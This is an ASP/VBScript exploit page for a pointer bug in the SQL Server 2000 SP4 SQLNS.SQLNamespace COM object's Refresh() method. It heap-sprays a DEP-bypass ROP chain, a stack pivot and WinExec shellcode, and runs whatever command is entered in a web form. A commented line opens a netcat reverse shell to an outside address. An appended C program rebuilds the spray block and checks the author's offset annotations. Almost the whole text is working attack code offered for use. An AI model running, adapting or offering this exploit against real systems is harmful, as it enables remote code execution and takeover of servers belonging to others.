<%
' Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() pointer error exploit (DEP bypass)
' Heap-sprays a 2048-byte payload block across ~200 MB, then hands Refresh() the sprayed address 0x0c0c0c0c.

' Returns intLen bytes of 0x41 filler (each %u4141 unit is two bytes in memory).
Function Padding(intLen)
    Dim strRet, intSize
    intSize = intLen / 2 - 1
    For I = 0 To intSize Step 1
        strRet = strRet & UnEscape("%u4141")
    Next
    Padding = strRet
End Function

' Packs a "0xAABBCCDD" string so the bytes DD CC BB AA (little-endian DWORD) land in memory.
Function PackDWORD(strPoint)
    strTmp = Replace(strPoint, "0x", "")
    PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 5, 2) & Mid(strTmp, 7, 2))
    PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 1, 2) & Mid(strTmp, 3, 2))
End Function

' Packs an array of address strings back to back (used for the ROP chain).
Function PackList(arrList)
    For Each Item In arrList
        PackList = PackList & PackDWORD(Item)
    Next
End Function

' Packs a "\xAA\xBB..." byte string into memory order; an odd byte count gets a trailing NOP (0x90).
Function PackShellcode(strCode)
    intLen = Len(strCode) / 4
    If intLen Mod 2 = 1 Then
        strCode = strCode & "\x90"
        intLen = intLen + 1
    End If
    arrTmp = Split(strCode, "\x")
    For I = 1 To UBound(arrTmp) Step 2
        PackShellcode = PackShellcode & UnEscape("%u" & arrTmp(I + 1) & arrTmp(I))
    Next
End Function

' Lays a VBScript (UTF-16) string out as a NUL-terminated ASCII string in memory, two
' characters per %u unit, so WinExec receives an ANSI lpCmdLine. Uses its parameter
' throughout (the original read the global strCommand regardless of the argument).
Function UnicodeToAscii(uStrIn)
    intLen = Len(uStrIn)
    If intLen Mod 2 = 1 Then
        For I = 1 To intLen - 1 Step 2
            UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(uStrIn, I + 1, 1))) & Hex(Asc(Mid(uStrIn, I, 1)))
        Next
        ' Odd length: last character followed by a NUL byte
        UnicodeToAscii = UnicodeToAscii & "%u00" & Hex(Asc(Mid(uStrIn, I, 1)))
    Else
        For I = 1 To intLen - 1 Step 2
            UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(uStrIn, I + 1, 1))) & Hex(Asc(Mid(uStrIn, I, 1)))
        Next
    End If
    ' Four NUL bytes terminate the string
    UnicodeToAscii = UnEscape(UnicodeToAscii & "%u0000%u0000")
End Function

'''''''''''''''''''''''''''''bypass DEP with [msvcr71.dll] 92 bytes
Rop_Chain = Array( _
    "0x41414141", _
    "0x7c373ab6", _
    "0x7c3425bc", _
    "0x7c376fc5", _
    "0x7c343423", _
    "0x7c3415a2", _
    "0x7c373ab6", _
    "0x41414141", _
    "0x41414141", _
    "0x41414141", _
    "0x41414141", _
    "0x7c344dbe", _
    "0x7c376fc5", _
    "0x7c373ab6", _
    "0x7c373ab6", _
    "0x7c351cc5", _
    "0x7c3912a3", _
    "0x7c3427e5", _
    "0x7c346c0b", _
    "0x7c3590be", _
    "0x7c37a151", _
    "0x7c378c81", _
    "0x7c345c30" _
)

' Stack pivot: ESP = FS:[0] (the TEB's NtTib.ExceptionList), then jump over the NOPs and the DWORD that follows
Small_Shellcode = "\x64\x8B\x25\x00\x00\x00\x00\xeb\x07\x90\x90\x90"
'0C0C0C6C  64:8B25 00000000   MOV ESP,DWORD PTR FS:[0]
'0C0C0C73  EB 07              JMP SHORT 0C0C0C7C
'0C0C0C75  90                 NOP
'0C0C0C76  90                 NOP
'0C0C0C77  90                 NOP
'12 bytes

Fix_ESP = "\x83\xEC\x24\x8B\xEC\x83\xC5\x30"
'0C0C0C7C  83EC 24            SUB ESP,24
'0C0C0C7F  8BEC               MOV EBP,ESP
'0C0C0C81  83C5 30            ADD EBP,30
'8 bytes

'''''''''''''''''''''''''''''shellcode WinExec (win2k sp2)
Real_Shellcode = "\xd9\xee\x9b\xd9\x74\x24\xf4\x5e\x83\xc6\x1a\x33\xc0\x50\x56\x68\x41\x41\x41\x41\x68\x16\x41\x86\x7c\xc3"
'D9EE         FLDZ
'9B           WAIT
'D97424 F4    FSTENV (28-BYTE) PTR SS:[ESP-C]   ; GetPC: the saved FPU instruction pointer lands at [ESP]
'5E           POP ESI                          ; ESI = address of FLDZ
'83C6 1A      ADD ESI,1A                       ; ESI = address of the command string right after these 26 bytes
'33C0         XOR EAX,EAX
'50           PUSH EAX                         ; uCmdShow = 0 (SW_HIDE)
'56           PUSH ESI                         ; lpCmdLine
'68 41414141  PUSH 41414141                    ; return address (the listing this came from had kernel32.ExitThread, 68 F1F8807C, here)
'68 1641867C  PUSH kernel32.WinExec
'C3           RETN                             ; jumps into WinExec

'''''''''''''''''''''''''''''main
Dim strCmd
strCmd = Request("cmd")
strCommand = "cmd.exe /q /c " & strCmd
'strCommand = "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 192.168.194.1 8080"

' Real shellcode followed directly by the ASCII command string it expects at ESI+0x1a
strOpcode = PackShellcode(Real_Shellcode) & UnicodeToAscii(strCommand)
intOpcode = Len(strOpcode)   ' counted in 16-bit units, so the byte length is intOpcode*2

' One 2048-byte block: 1000 filler + 4 (0x0c0c0c0c) + 92 ROP + 12 pivot + 4 + 8 Fix_ESP + 928 (shellcode, command, padding)
Payload = String((1000/2), UnEscape("%u4141")) & _
          PackDWORD("0x0c0c0c0c") & _
          PackList(Rop_Chain) & _
          PackShellcode(Small_Shellcode) & _
          PackDWORD("0x5a64f0fe") & _
          PackShellcode(Fix_ESP) & _
          strOpcode & _
          Padding(928 - intOpcode*2)
'Response.Write Len(Payload)

' 512 copies of the block = 1 MB; 201 of those (~200 MB) reach past 0x0c0c0c0c (~193 MB)
Dim Block
For N = 1 To 512
    Block = Block & Payload
Next

Dim spray()
For I = 0 To 200 Step 1
    ReDim Preserve spray(I)
    spray(I) = Block
Next

If strCmd = "" Then
    Response.Write "Please Input command! <br />"
Else
    Set obj = CreateObject("SQLNS.SQLNamespace")
    Response.Write "Try to Execute: " & strCommand
    arg1 = 202116108   '0x0c0c0c0c, which Refresh() treats as a pointer
    obj.Refresh arg1
End If
%>
<html>
<head>
<title>Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit (DEP bypass)</title>
</head>
<body>
<p>
Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit (DEP bypass) <br />
Other versions not tested :) <br />
Bug found and exploit by ylbhz@hotmail.com at 2012/04/03<br />
</p>
<form action="" method="post">
Program to Execute: <input type="text" value="<%=strCmd%>" size="120" name="cmd"><input type="submit" value="Exploit">
</form>
</body>
</html>
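The spray above works because every 1 MB Block is 512 identical copies of the 2048-byte Payload, so whichever copy 0x0c0c0c0c lands in, the byte it hits is determined only by the block offset, i.e. by the address modulo 2048 and the skew of the first block's base. The following C program is an added example, not code from the exploit or its author: it rebuilds the same 2048-byte block from the page's constants and resolves the addresses the author annotated in the disassembly comments (0x0C0C0C6C for Small_Shellcode, 0x0C0C0C7C for Fix_ESP) to block offsets. Solving from those comments gives a block base of 0x24 modulo 2048; whether a live heap produces exactly that skew is an assumption taken from the author's annotations, as is the sample command string, which is constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example: rebuilds the page's 2048-byte spray block and resolves absolute
 * addresses to block offsets. Not part of the original exploit. */

#define BLOCK_SIZE   2048u
#define SPRAY_ADDR   0x0c0c0c0cu   /* arg1 handed to Refresh(), also stored at block offset 1000 */
#define PIVOT_DWORD  0x5a64f0feu   /* PackDWORD("0x5a64f0fe") between Small_Shellcode and Fix_ESP */
#define FILL_BYTES   1000u         /* String(1000/2, "%u4141") */
#define OPCODE_ROOM  928u          /* Real_Shellcode + command + Padding(928 - intOpcode*2) */
#define SAMPLE_CMD   "cmd.exe /q /c calc"   /* constructed sample command */

/* Values copied verbatim from the page's Rop_Chain, Small_Shellcode, Fix_ESP and Real_Shellcode. */
static const uint32_t rop_chain[] = {
    0x41414141, 0x7c373ab6, 0x7c3425bc, 0x7c376fc5, 0x7c343423, 0x7c3415a2,
    0x7c373ab6, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x7c344dbe,
    0x7c376fc5, 0x7c373ab6, 0x7c373ab6, 0x7c351cc5, 0x7c3912a3, 0x7c3427e5,
    0x7c346c0b, 0x7c3590be, 0x7c37a151, 0x7c378c81, 0x7c345c30,
};
static const uint8_t small_shellcode[] = { 0x64,0x8b,0x25,0x00,0x00,0x00,0x00, 0xeb,0x07, 0x90,0x90,0x90 };
static const uint8_t fix_esp[]         = { 0x83,0xec,0x24, 0x8b,0xec, 0x83,0xc5,0x30 };
static const uint8_t real_shellcode[]  = { 0xd9,0xee, 0x9b, 0xd9,0x74,0x24,0xf4, 0x5e, 0x83,0xc6,0x1a,
                                           0x33,0xc0, 0x50, 0x56, 0x68,0x41,0x41,0x41,0x41,
                                           0x68,0x16,0x41,0x86,0x7c, 0xc3 };

/* PackDWORD equivalent: store a 32-bit value little-endian. */
static void put_le32(uint8_t *dst, uint32_t v)
{
    dst[0] = (uint8_t)v; dst[1] = (uint8_t)(v >> 8); dst[2] = (uint8_t)(v >> 16); dst[3] = (uint8_t)(v >> 24);
}

static uint32_t get_le32(const uint8_t *s)
{
    return (uint32_t)s[0] | (uint32_t)s[1] << 8 | (uint32_t)s[2] << 16 | (uint32_t)s[3] << 24;
}

/* Fills blk (BLOCK_SIZE bytes) with the same layout as Payload in the ASP.
 * Returns BLOCK_SIZE, or 0 if shellcode plus command exceed the 928-byte room. */
size_t build_block(uint8_t *blk, const char *command)
{
    size_t cmdlen = strlen(command);
    /* UnicodeToAscii: ASCII bytes, padded to an even count, then four NUL bytes (%u0000%u0000) */
    size_t cmd_bytes = cmdlen + (cmdlen & 1) + 4;
    if (sizeof real_shellcode + cmd_bytes > OPCODE_ROOM) return 0;

    size_t off = 0;
    memset(blk, 0x41, FILL_BYTES); off += FILL_BYTES;
    put_le32(blk + off, SPRAY_ADDR); off += 4;                /* 0x0c0c0c0c at offset 1000 */
    for (size_t i = 0; i < sizeof rop_chain / sizeof rop_chain[0]; i++) {
        put_le32(blk + off, rop_chain[i]); off += 4;          /* ROP chain at offset 1004 */
    }
    memcpy(blk + off, small_shellcode, sizeof small_shellcode); off += sizeof small_shellcode;  /* 1096 */
    put_le32(blk + off, PIVOT_DWORD); off += 4;                                                 /* 1108 */
    memcpy(blk + off, fix_esp, sizeof fix_esp); off += sizeof fix_esp;                          /* 1112 */
    memcpy(blk + off, real_shellcode, sizeof real_shellcode); off += sizeof real_shellcode;     /* 1120 */
    memcpy(blk + off, command, cmdlen); off += cmdlen;                                          /* 1146 */
    memset(blk + off, 0x00, cmd_bytes - cmdlen); off += cmd_bytes - cmdlen;
    memset(blk + off, 0x41, BLOCK_SIZE - off);                /* Padding(928 - intOpcode*2) */
    return BLOCK_SIZE;
}

/* Offset inside the repeating block of an absolute address, given the block base
 * modulo BLOCK_SIZE (heap and BSTR header skew; 0x24 is the assumed value, see lead-in). */
uint32_t block_offset(uint32_t addr, uint32_t base_mod) { return (addr - base_mod) & (BLOCK_SIZE - 1); }

/* The DWORD the target reads at addr, following the block's wrap-around byte by byte. */
uint32_t read_dword(const uint8_t *blk, uint32_t addr, uint32_t base_mod)
{
    uint8_t tmp[4];
    for (int i = 0; i < 4; i++) tmp[i] = blk[block_offset(addr + (uint32_t)i, base_mod)];
    return get_le32(tmp);
}

/* EB rel8 at insn_addr continues at insn_addr + 2 + rel8 (checks the author's JMP SHORT annotation). */
uint32_t jmp_short_target(uint32_t insn_addr, int8_t rel8) { return insn_addr + 2u + (uint32_t)(int32_t)rel8; }

/* Block built once for the constructed sample command. */
const uint8_t *sample_block(void)
{
    static uint8_t blk[BLOCK_SIZE];
    static int built = 0;
    if (!built) { build_block(blk, SAMPLE_CMD); built = 1; }
    return blk;
}
size_t sample_block_size(void) { uint8_t blk[BLOCK_SIZE]; return build_block(blk, SAMPLE_CMD); }

int main(void)
{
    const uint32_t base_mod = 0x24;   /* assumption derived from the annotated addresses */
    const uint8_t *blk = sample_block();
    printf("0x%08x -> block offset %u, holds 0x%08x\n", SPRAY_ADDR,
           block_offset(SPRAY_ADDR, base_mod), read_dword(blk, SPRAY_ADDR, base_mod));
    printf("ROP chain starts at 0x%08x: 0x%08x, 0x%08x, ...\n", SPRAY_ADDR + 4,
           read_dword(blk, SPRAY_ADDR + 4, base_mod), read_dword(blk, SPRAY_ADDR + 8, base_mod));
    printf("Small_Shellcode at offset %u, Fix_ESP at offset %u, JMP SHORT lands at 0x%08x\n",
           block_offset(0x0c0c0c6cu, base_mod), block_offset(0x0c0c0c7cu, base_mod),
           jmp_short_target(0x0c0c0c73u, 7));
    return 0;
}
```

With the 0x24 skew, 0x0c0c0c0c resolves to block offset 1000, exactly where PackDWORD("0x0c0c0c0c") sits, so the pointer Refresh() dereferences reads back its own value and the ROP chain begins at 0x0c0c0c10; the author's 0x0C0C0C6C and 0x0C0C0C7C annotations fall on the first byte of Small_Shellcode and Fix_ESP respectively, and the JMP SHORT from 0x0C0C0C73 lands on Fix_ESP as the listing claims. Changing base_mod shows how a different header skew shifts every landing point, which is why spray payloads lean on long runs of filler.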